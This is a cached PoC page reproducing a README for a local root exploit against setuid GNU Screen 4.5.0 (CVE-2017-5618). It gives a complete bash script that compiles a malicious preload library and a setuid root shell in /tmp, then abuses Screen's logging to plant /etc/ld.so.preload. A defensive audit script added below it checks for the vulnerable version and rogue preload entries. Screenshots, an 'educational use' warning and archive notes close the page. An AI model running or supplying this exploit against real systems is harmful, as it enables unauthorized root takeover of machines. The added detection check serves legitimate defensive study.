PoC details: 773e292b5d31338559b4b380abe6dbb2eb1a3acc

Source
Related vulnerability
Title: GNU Screen permission and access control vulnerability (CVE-2017-5618)
Description: GNU Screen is free software developed by the GNU Project for switching between command-line terminals. It supports connecting to several local or remote command-line sessions at once and switching freely between them. Versions of GNU Screen before 4.5.1 contain a security vulnerability. A local attacker could exploit it to modify arbitrary files and gain root privileges.
Description
Local privilege escalation exploit for GNU Screen 4.5.0 (CVE-2017-5618). It exploits a vulnerability in the logging feature to hijack shared library loading and gain root access via ld.so.preload manipulation. Vulnerable: Screen 4.5.0 (SUID). Fixed in: Screen 4.6.0+.
Introduction
# GNU Screen 4.5.0 Local Privilege Escalation Exploit (CVE-2017-5618)

## 📌 Overview
Local privilege escalation exploit for GNU Screen 4.5.0 that hijacks shared library loading to gain **root access** via `ld.so.preload` manipulation.


## 🔧 Technical Details

Vulnerability: CVE-2017-5618

Type: Shared Library Hijacking via ld.so.preload

Affected: GNU Screen 4.5.0 exclusively

Fixed in: GNU Screen 4.6.0+



## 🎪 The Vulnerability Circus


CVE: 2017-5618 🎯

***The Bug: setuid Screen 4.5.0 creates its log file, at a path the user chooses, with DANGEROUS permissions***

***The Magic: We trick it into creating /etc/ld.so.preload that loads our malicious library***

***The Payload: Instant root shell! 🐚***



## Script 🗒️

```bash
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2017-5618
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
/* constructor runs as soon as the library is loaded through ld.so.preload */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
#include <unistd.h>
int main(void){
    char *const argv[] = { "/bin/sh", NULL };
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", argv);
    return 1;
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # so the log file screen creates is world-writable
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
echo "[+] Triggering..."
screen -ls
/tmp/rootshell
```
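As a defender-side counterpart, here is an added host check (not part of the original PoC) that flags a setuid Screen 4.5.0 from its version string, lists ld.so.preload entries outside the system library directories (the PoC plants /tmp/libhax.so), and reports a world-writable preload file. It assumes GNU-style `screen --version` output, a `find` supporting `-prune`/`-perm`, and /etc/ld.so.preload as the preload path.

```bash
#!/bin/bash
# Added host check (not from the PoC): setuid Screen 4.5.0 and rogue ld.so.preload entries.

# Drop leading zeros from one version component ("05" -> 5, "00" -> 0).
strip_zeros() {
    local v="${1#"${1%%[!0]*}"}"
    printf '%s' "${v:-0}"
}
# Returns 0 if a "screen --version" line names the affected release 4.5.0
# (printed by Screen as 4.05.00); every other release is treated as not affected.
screen_version_vulnerable() {
    local ver major rest minor patch
    ver=$(printf '%s' "$1" | grep -oE '[0-9]+\.[0-9]+\.[0-9]+' | head -n1)
    [ -n "$ver" ] || return 2
    major=$(strip_zeros "${ver%%.*}"); rest="${ver#*.}"
    minor=$(strip_zeros "${rest%%.*}"); patch=$(strip_zeros "${rest#*.}")
    [ "$major" -eq 4 ] && [ "$minor" -eq 5 ] && [ "$patch" -eq 0 ]
}

# Prints each ld.so.preload entry outside the system library directories (the PoC
# plants /tmp/libhax.so) and returns 1 if any exists; a missing file passes with 0.
preload_suspicious_entries() {
    local file="$1" found=0 line
    [ -e "$file" ] || return 0
    while IFS= read -r line || [ -n "$line" ]; do
        line=$(printf '%s' "${line%%#*}" | tr -d ' \t')   # strip comments/whitespace
        [ -z "$line" ] && continue                          # the PoC writes a leading newline
        case "$line" in
            /lib/*|/lib64/*|/usr/lib/*|/usr/lib64/*|/usr/local/lib/*) ;;
            *) printf 'suspicious preload entry: %s\n' "$line"; found=1 ;;
        esac
    done < "$file"
    return "$found"
}

# Returns 0 if the preload file is writable by every local user (what "umask 000" leaves).
preload_world_writable() {
    [ -n "$(find "$1" -prune -type f -perm -002 2>/dev/null)" ]
}

# Audit the live host (run with --audit); assumes screen is in PATH.
audit_host() {
    local bin; bin=$(command -v screen) || { echo "screen not installed"; return 0; }
    [ -u "$bin" ] && screen_version_vulnerable "$("$bin" --version)" \
        && echo "VULNERABLE: setuid $bin is Screen 4.5.0 (CVE-2017-5618)"
    preload_suspicious_entries /etc/ld.so.preload || true
    preload_world_writable /etc/ld.so.preload && echo "/etc/ld.so.preload is world-writable"
    return 0
}
[ "${1:-}" = "--audit" ] && audit_host
```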
## Screenshots

> Checking Vulnerable Screen Version.

![Screen version detected](images/screen.png)


> Creating The File And Giving Required Permissions.

![Making](images/making.png)


> Root Access Gained.

![Root](images/root.png)

> Root shell achieved - full system control

## ⚠️ Warning Label


FOR EDUCATIONAL USE ONLY! ⚠️
Don't be a script kiddie - use this only on systems you own or have explicit permission to test.

## Tested On
TryHackMe KOTH Room - Food
File snapshot

```text
[4.0K] /data/pocs/773e292b5d31338559b4b380abe6dbb2eb1a3acc
├── [4.0K] images
│   ├── [ 65K] making.png
│   ├── [ 52K] root.png
│   ├── [ 58K] screen.png
│   └── [ 2] SUP
├── [ 34K] LICENSE
└── [2.2K] README.md

1 directory, 6 files
```
Cached for you by the Shenlong bot
Notes
    1. It is recommended to access the PoC through the source link first.
    2. If the source is gone or unreachable, send an e-mail to f.jinxu#gmail.com (replace # with @) to request the local snapshot.
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.